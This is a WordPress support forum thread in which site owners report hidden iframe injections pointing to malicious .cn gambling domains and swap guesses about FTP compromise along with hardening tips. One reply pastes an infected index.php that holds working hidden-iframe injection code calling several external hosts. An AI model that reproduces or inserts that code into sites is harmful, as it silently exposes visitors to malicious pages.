Just had a WordPress site of mine that was hacked earlier this morning, had an iframe directing to lotultimatebet.cn inserted in the main *.php files throughout the site.
Has anyone else experienced this? And does anyone know how to protect against whatever attack was used?
To guarantee that you won’t get hacked always use the latest version of wordpress, only use plugins, scripts and themes which you trust and use a secure password for your wordpress admin, your database and your ftp. Just out of interest, what is the url for your site?
I had the same thing. I am using wp 2.5.1 on the site. When upgrading to 2.7.1 ran into problems on another site so didn’t yet upgrade yet.
In fact the one with 2.7.1 has been hacked too. I can’t even get back into the back-end at the moment.
Be aware joeyconnick that you could possibly have a rootkit installed on your system.
I’ve recently had issues with sites that I develop, albeit .Net sites, also hacked and injected with same/similar iframe code. An example below…
I believe that my system was compromised with a rootkit, and access details to the sites I manage were retrieved for the express interest of further propogating the rootkit. I say this becuase AVG picked up the presence of rootkit activity after I viewed an infected page.
In regards to how I was compromised… I was not surfing inappropriate material, nor executing unkown files… I think it’s probably a firefox exploit… more than likely on a add-on. Good Luck.
Thanks for the info, bsains. I doubt it’s a rootkit on my system but it might be one on the system of my friend whose blog it is. She’s the one who usually interacts with it.
We were also advised it might have been a brute-force attack against her ftp password.
Yeah, the injected iframe stuff for us was the lotultimatebet site.
I’ll see if her anti-virus software has rootkit detection.
This is not a WordPress exploit. Most likely FTP password is compromised.
I’ve just covered this particular exploit in my blog.
- Scan local computers for viruses and spyware
- Change FTP passwords
- Upload clean content from a backup
For the future:
1. Change your database prefix:
2. Change username from admin to somehthing else
3. Install the following plugins:
-apache password protect:
-wordpress security scan:
4. Disable ping response (ICMP) on your server (if you have the rights), this will prevent some DOS attacks:
Here is what appears in my index.php file
<?php /* Short and sweet */ define('WP_USE_THEMES', true); require('./blog/wp-blog- header.php'); echo "<iframe src=\"http://xtrarobotz.com/?click=BC0230\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"; echo "<iframe src=\"http://nipkelo.net/?click=E74A05\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"; echo "<iframe src=\"http://internetcountercheck.com/?click=14784531\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"; ?> <iframe src="http://hotslotpot.cn/in.cgi?income65" width=1 height=1 style="visibility: hidden"></iframe> <iframe src="http://hotslotpot.cn/in.cgi?income66" width=1 height=1 style="visibility: hidden"></iframe> <iframe src="http://hotslotpot.cn/in.cgi?income67" width=1 height=1 style="visibility: hidden"></iframe> <iframe src="http://betworldwager.cn/in.cgi?income68" width=1 height=1 style="visibility: hidden"></iframe> <iframe src="http://litecartop.cn/in.cgi?income70" width=1 height=1 style="visibility: hidden"></iframe>
What should I do now… All my blogs have been similarly hacked, even non-wordpress domains
The income .cn iframes are not even PHP-related. They are added at the bottom of files like index.html, index.php, etc.
The xtrarobotz/nipkelo/internetcountercheck hack is more sophisticated – it injects PHP-code. I didn’t investigate it, but since they usually appear on the same sites as the income .cn iframes, I assume the same compromised passwords are used.
We got hacked when we installed this WordPress plug-in: Make Tabbloid. We believe it takes advantage of the PDF creation tool and therefore allowed the hacker to gain acccess.Anonymous
does any one have any plugin which automatically sends alert to the owners email address if some one try wrong password on our blog or have other kind of instant notification. That would be also helpful what do you guys think?
My website was also hacked this week and I’ve been spending the last two days fixing it. I think I finally got is resolved. They injected links into alot of the theme files and then iframe injections into some posts. It was really weird. I removed the admin user, changed the passwords, and added alot of plugins that were suggested in this blog: http://www.aboutonlinetips.com/wordpress-security-plugins/
- The topic ‘WordPress hacked’ is closed to new replies.